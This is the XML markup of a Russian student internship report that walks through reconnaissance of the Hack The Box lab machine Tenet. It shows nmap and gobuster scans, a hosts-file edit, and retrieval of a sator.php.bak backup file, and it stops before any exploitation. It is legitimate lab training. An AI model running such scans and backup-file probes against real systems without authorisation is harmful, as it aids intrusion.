          <w:p w14:paraId="06B02223" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00434B48" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="6B968308" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="420C43EC" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00434B48" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="35D7A794" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="082DC2FE" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70BA4AE2" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00434B48" w:rsidRDefault="00236B7A" w:rsidP="00EC110E">
            <w:pPr>
              <w:contextualSpacing/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00236B7A" w:rsidRPr="003757BC" w14:paraId="3EA48011" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D44ACC3" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="009F763B" w:rsidRDefault="00236B7A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236B7A" w:rsidRPr="003757BC" w14:paraId="5C8E60CF" w14:textId="77777777" w:rsidTr="00C473FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47D1F41A" w14:textId="6F7F3D77" w:rsidR="00236B7A" w:rsidRPr="00ED6C98" w:rsidRDefault="00236B7A" w:rsidP="00ED6C9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D6C98">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00387207">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3230F49E" w14:textId="6A9527D0" w:rsidR="007B1036" w:rsidRPr="007B1036" w:rsidRDefault="007B1036" w:rsidP="007B1036">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Задание на практику</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77254109" w14:textId="77777777" w:rsidR="007B1036" w:rsidRDefault="007B1036" w:rsidP="007B1036">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620BCBC7" w14:textId="02D6194C" w:rsidR="007B1036" w:rsidRPr="007B1036" w:rsidRDefault="007B1036" w:rsidP="007B1036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ентес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ртуальной машины</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> взятой с портала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hack</w:t>
      </w:r>
      <w:r w:rsidRPr="007B10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7B10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 w:rsidRPr="007B1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сложности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1036">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC42E01" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRPr="00414FA0" w:rsidRDefault="00236B7A" w:rsidP="00B37F43">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D27FB7" w14:textId="77777777" w:rsidR="00236B7A" w:rsidRDefault="00236B7A" w:rsidP="00196886">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4725CBA2" w14:textId="0B3E0F02" w:rsidR="007B1036" w:rsidRDefault="007B1036" w:rsidP="00196886">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="007B1036" w:rsidSect="00B37F4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484CC0" w14:textId="6429F407" w:rsidR="00DD3E71" w:rsidRPr="00ED4FDF" w:rsidRDefault="007B1036" w:rsidP="00ED4FDF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D87185" wp14:editId="025724C3">
            <wp:extent cx="6118860" cy="4290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5C23" w14:textId="5D92451D" w:rsidR="00577248" w:rsidRPr="004E05AE" w:rsidRDefault="00577248" w:rsidP="00745F66">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AE94D0" w14:textId="1BA07642" w:rsidR="00577248" w:rsidRDefault="007B1036" w:rsidP="004E0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лом мы зарегистрировались на портале и выбрали виртуальную машину </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tenet</w:t>
      </w:r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7B1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0.10.223. Далее мы запустили </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="007B10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7B10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в</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> командной строке, при помощи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1036">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мы просканировали порты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E588EF" w14:textId="1403EBAF" w:rsidR="007B1036" w:rsidRPr="00C5470F" w:rsidRDefault="007B1036" w:rsidP="004E05A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map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C5470F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sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C5470F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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C5470F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575550A" w14:textId="6FA3E355" w:rsidR="00C5470F" w:rsidRPr="00C5470F" w:rsidRDefault="00C5470F" w:rsidP="004E0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00CBCB" wp14:editId="37666E57">
            <wp:extent cx="5916295" cy="17608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F304" w14:textId="734AA721" w:rsidR="00F058EB" w:rsidRDefault="00F058EB" w:rsidP="004800F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканирование показывает открытые порты 22 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) и 80 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29BBF0" w14:textId="39068BA6" w:rsidR="00F058EB" w:rsidRPr="00F058EB" w:rsidRDefault="00F058EB" w:rsidP="004E05AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее мы переходим к порту 80 с помощью браузера, чтобы проверить веб-сайт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2972B2" w14:textId="1D93DEA3" w:rsidR="00F058EB" w:rsidRPr="00F058EB" w:rsidRDefault="00F058EB" w:rsidP="00F058EB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inherit" w:hAnsi="inherit"/>
          <w:noProof/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081961E0" wp14:editId="18B9900E">
            <wp:extent cx="6118860" cy="2956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4EF7" w14:textId="77777777" w:rsidR="007B1036" w:rsidRPr="00F058EB" w:rsidRDefault="007B1036" w:rsidP="007B1036">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220315C3" w14:textId="323893D9" w:rsidR="00F058EB" w:rsidRPr="00F058EB" w:rsidRDefault="00F058EB" w:rsidP="00F058EB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Страница возвращает страницу </w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 по умолчанию для </w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Запускаем сканирование </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004800F7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для перечисления скрытых файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4DD59" w14:textId="74914E79" w:rsidR="007B1036" w:rsidRPr="004800F7" w:rsidRDefault="00F058EB" w:rsidP="00F058EB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F058EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и папки. В командной строке пишем</w:t>
      </w:r>
      <w:r w:rsidR="004800F7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE5077" w14:textId="5FCEAD51" w:rsidR="00F058EB" w:rsidRDefault="00F058EB" w:rsidP="00F058EB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DBE3E8" w14:textId="3DDCB55F" w:rsidR="00A805F6" w:rsidRDefault="00A805F6" w:rsidP="00F058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805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.10.10.223 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726D2EE" w14:textId="09313091" w:rsidR="00A805F6" w:rsidRPr="00A805F6" w:rsidRDefault="00A805F6" w:rsidP="00F058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DDB27A" wp14:editId="68E00867">
            <wp:extent cx="5694983" cy="120716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39" cy="121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D74A" w14:textId="622DFC4B" w:rsidR="00C5470F" w:rsidRDefault="00A805F6" w:rsidP="00C5470F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сканирование показывает каталог </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, и</w:t>
      </w:r>
      <w:r w:rsidR="00C5470F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>при переходе к нему</w:t>
      </w:r>
      <w:r w:rsidR="00C5470F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> оказывается, сломана страница </w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. При выборе любой из ссылок под названием </w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TENET</w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-страница перенаправляется на имя хоста</w:t>
      </w:r>
      <w:r w:rsidR="00C5470F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tenet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1235B3AC" w14:textId="77777777" w:rsidR="00C5470F" w:rsidRDefault="00C5470F" w:rsidP="00C5470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15EE26" wp14:editId="3FA83BFE">
            <wp:extent cx="5302373" cy="384035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50" cy="38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F6" w:rsidRPr="00A8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6F300A3" w14:textId="2F26EFDF" w:rsidR="007B1036" w:rsidRDefault="00C5470F" w:rsidP="00C5470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5F6" w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее мы добавили эт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у ссылку</w:t>
      </w:r>
      <w:r w:rsidR="00A805F6" w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в файл </w:t>
      </w:r>
      <w:r w:rsidR="00A805F6" w:rsidRPr="00A805F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60209EB2" w14:textId="53CBDFF7" w:rsidR="00C5470F" w:rsidRDefault="00C5470F" w:rsidP="00C54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42991F" wp14:editId="0E9A62C5">
            <wp:extent cx="5164786" cy="38116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84" cy="381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F85C" w14:textId="5C9356D7" w:rsidR="00C5470F" w:rsidRDefault="00C5470F" w:rsidP="00C54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ссылку и видим, что страница работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7770EA" w14:textId="421AFC64" w:rsidR="00C5470F" w:rsidRPr="00C5470F" w:rsidRDefault="00C5470F" w:rsidP="00C54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BCD871" wp14:editId="0EF1B075">
            <wp:extent cx="5527078" cy="401110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57" cy="40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D131" w14:textId="17F70390" w:rsidR="00630387" w:rsidRDefault="00C5470F" w:rsidP="0057724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т сайт имеет комментарий от некоего </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>neil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, который пишет про файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C547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C5470F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и про его бэкап, который предположительно был удален во время переезда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A506E5F" w14:textId="77777777" w:rsidR="00C949F8" w:rsidRDefault="00C949F8" w:rsidP="00577248">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A991D7F" w14:textId="72DA31E3" w:rsidR="00C949F8" w:rsidRDefault="00C949F8" w:rsidP="00577248">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeas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E34D52" wp14:editId="05DFB973">
            <wp:extent cx="4785437" cy="26503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04" cy="266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CBC0" w14:textId="747FD838" w:rsidR="00C949F8" w:rsidRDefault="00C949F8" w:rsidP="00577248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ы переходим на </w:t>
      </w:r>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http: //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tenet.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sator.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> но такого сайта нет. Пробуем </w:t>
      </w:r>
      <w:r w:rsidRPr="00C949F8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://10.10.10.223/sator.php и отображается следующий вывод</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796C7CA" w14:textId="0FC9EAC4" w:rsidR="00C949F8" w:rsidRPr="00C5470F" w:rsidRDefault="00C949F8" w:rsidP="00577248">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast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2CB964" wp14:editId="025847DF">
            <wp:extent cx="4019550" cy="1931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38A4" w14:textId="781584F9" w:rsidR="00236B7A" w:rsidRDefault="00C949F8" w:rsidP="000F06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поминаем про бэкап. Наиболее распространенное расширение бэкапов </w:t>
      </w:r>
      <w:r w:rsidRPr="00C949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ak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ереходим на </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="003F085B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://10.10.10.223/sator.php</w:t>
        </w:r>
        <w:r w:rsidRPr="003F085B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="003F085B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Начинается скачивание файла. Открываем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B2C15" w14:textId="77777777" w:rsidR="00C949F8" w:rsidRDefault="00C949F8" w:rsidP="000F0663">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
